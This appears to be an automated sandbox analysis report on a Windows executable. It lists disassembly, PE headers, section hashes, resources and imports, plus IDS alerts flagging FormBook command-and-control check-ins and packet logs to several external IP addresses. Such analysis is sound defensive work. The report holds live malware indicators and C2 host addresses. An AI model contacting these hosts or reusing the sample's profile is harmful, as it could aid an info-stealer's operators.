jne 00007F8D4519802Dh
bt edi, 02h
jnc 00007F8D45197E9Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F8D45197EA3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F8D45197EF5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x6c8a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x135000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x6c8a4	0x6ca00	0625eb3cef03f7a04ee0a67de4af8412	False	0.9392530926352128	data	7.918869432738403	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x135000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x63b3c	data			1.0003207796659974
RT_GROUP_ICON	0x1342f4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x13436c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x134380	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x134394	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1343a8	0x10c	data	English	Great Britain	0.5895522388059702
RT_MANIFEST	0x1344b4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-12T13:03:07.807164+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54855	80	192.168.2.6	15.197.172.60
2024-08-12T13:03:21.353702+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54859	80	192.168.2.6	66.29.149.46
2024-08-12T13:03:34.869178+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54863	80	192.168.2.6	195.110.124.133
2024-08-12T13:01:18.488813+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54839	80	192.168.2.6	116.50.37.244
2024-08-12T13:01:04.628717+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54834	80	192.168.2.6	52.25.92.0
2024-08-12T13:02:54.400290+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54851	80	192.168.2.6	91.195.240.94
2024-08-12T13:04:10.305369+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54873	80	192.168.2.6	217.196.55.202
2024-08-12T13:02:40.788859+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54845	80	192.168.2.6	85.159.66.93
2024-08-12T13:00:41.026511+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54829	80	192.168.2.6	154.215.72.110
2024-08-12T13:03:48.461240+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	54867	80	192.168.2.6	15.197.240.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2024 13:00:40.139137983 CEST	54829	80	192.168.2.6	154.215.72.110
Aug 12, 2024 13:00:40.144057989 CEST	80	54829	154.215.72.110	192.168.2.6
Aug 12, 2024 13:00:40.144149065 CEST	54829	80	192.168.2.6	154.215.72.110
Aug 12, 2024 13:00:40.147324085 CEST	54829	80	192.168.2.6	154.215.72.110
Aug 12, 2024 13:00:40.153641939 CEST	80	54829	154.215.72.110	192.168.2.6
Aug 12, 2024 13:00:41.026031971 CEST	80	54829	154.215.72.110	192.168.2.6
Aug 12, 2024 13:00:41.026212931 CEST	80	54829	154.215.72.110	192.168.2.6
Aug 12, 2024 13:00:41.026510954 CEST	54829	80	192.168.2.6	154.215.72.110
Aug 12, 2024 13:00:41.029875040 CEST	54829	80	192.168.2.6	154.215.72.110
Aug 12, 2024 13:00:41.036231995 CEST	80	54829	154.215.72.110	192.168.2.6
Aug 12, 2024 13:00:56.409065962 CEST	54830	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:56.413955927 CEST	80	54830	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:56.414046049 CEST	54830	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:56.416621923 CEST	54830	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:56.421456099 CEST	80	54830	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:57.014434099 CEST	80	54830	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:57.014494896 CEST	80	54830	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:57.014534950 CEST	80	54830	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:57.014561892 CEST	54830	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:57.014600992 CEST	54830	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:57.928960085 CEST	54830	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:58.947588921 CEST	54832	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:58.953985929 CEST	80	54832	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:58.954092026 CEST	54832	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:58.955890894 CEST	54832	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:00:58.961210012 CEST	80	54832	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:59.547998905 CEST	80	54832	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:59.548060894 CEST	80	54832	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:59.548157930 CEST	80	54832	52.25.92.0	192.168.2.6
Aug 12, 2024 13:00:59.548219919 CEST	54832	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:00.460228920 CEST	54832	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:01.479094028 CEST	54833	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:01.484263897 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:01.484381914 CEST	54833	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:01.485968113 CEST	54833	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:01.490922928 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:01.491005898 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:02.368303061 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:02.368505955 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:02.368527889 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:02.368561983 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:02.368602991 CEST	54833	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:02.368630886 CEST	54833	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:02.372740030 CEST	80	54833	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:02.372833014 CEST	54833	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:02.994688988 CEST	54833	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.011183023 CEST	54834	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.017227888 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.017366886 CEST	54834	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.019870043 CEST	54834	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.024779081 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.628468037 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.628504992 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.628622055 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.628716946 CEST	54834	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.629117012 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.629133940 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.629151106 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:04.629177094 CEST	54834	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.629214048 CEST	54834	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.642364025 CEST	54834	80	192.168.2.6	52.25.92.0
Aug 12, 2024 13:01:04.647290945 CEST	80	54834	52.25.92.0	192.168.2.6
Aug 12, 2024 13:01:10.013904095 CEST	54836	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:10.018940926 CEST	80	54836	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:10.019046068 CEST	54836	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:10.020818949 CEST	54836	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:10.025747061 CEST	80	54836	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:10.893358946 CEST	80	54836	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:10.893400908 CEST	80	54836	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:10.893496037 CEST	54836	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:11.523118973 CEST	54836	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:12.541347980 CEST	54837	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:12.547959089 CEST	80	54837	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:12.548085928 CEST	54837	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:12.549856901 CEST	54837	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:12.554836035 CEST	80	54837	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:13.423549891 CEST	80	54837	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:13.423609018 CEST	80	54837	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:13.423845053 CEST	54837	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:14.054147005 CEST	54837	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:15.072680950 CEST	54838	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:15.077766895 CEST	80	54838	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:15.077908039 CEST	54838	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:15.079633951 CEST	54838	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:15.084558964 CEST	80	54838	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:15.084659100 CEST	80	54838	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:15.960552931 CEST	80	54838	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:15.960603952 CEST	80	54838	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:15.960669994 CEST	54838	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:16.585362911 CEST	54838	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:17.603869915 CEST	54839	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:17.609242916 CEST	80	54839	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:17.609419107 CEST	54839	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:17.611202955 CEST	54839	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:17.616535902 CEST	80	54839	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:18.488327026 CEST	80	54839	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:18.488353014 CEST	80	54839	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:18.488812923 CEST	54839	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:18.490835905 CEST	54839	80	192.168.2.6	116.50.37.244
Aug 12, 2024 13:01:18.497912884 CEST	80	54839	116.50.37.244	192.168.2.6
Aug 12, 2024 13:01:32.181406021 CEST	54842	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:32.189609051 CEST	80	54842	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:32.189687014 CEST	54842	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:32.191545010 CEST	54842	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:32.199501991 CEST	80	54842	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:33.694744110 CEST	54842	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:33.893702984 CEST	80	54842	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:33.893786907 CEST	54842	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:34.909427881 CEST	54843	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:34.914697886 CEST	80	54843	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:34.914820910 CEST	54843	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:34.933160067 CEST	54843	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:34.938376904 CEST	80	54843	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:36.445069075 CEST	54843	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:36.451253891 CEST	80	54843	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:36.451452971 CEST	54843	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:37.505354881 CEST	54844	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:37.510492086 CEST	80	54844	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:37.510571957 CEST	54844	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:37.522520065 CEST	54844	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:37.528173923 CEST	80	54844	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:37.528186083 CEST	80	54844	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:39.041019917 CEST	54844	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:39.046530962 CEST	80	54844	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:39.046622038 CEST	54844	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:40.057873011 CEST	54845	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:40.062781096 CEST	80	54845	85.159.66.93	192.168.2.6
Aug 12, 2024 13:01:40.062877893 CEST	54845	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:40.065392017 CEST	54845	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:01:40.070203066 CEST	80	54845	85.159.66.93	192.168.2.6
Aug 12, 2024 13:02:40.788630962 CEST	80	54845	85.159.66.93	192.168.2.6
Aug 12, 2024 13:02:40.788664103 CEST	80	54845	85.159.66.93	192.168.2.6
Aug 12, 2024 13:02:40.788858891 CEST	54845	80	192.168.2.6	85.159.66.93
Aug 12, 2024 13:02:40.791210890 CEST	54845	80	192.168.2.6	85.159.66.93
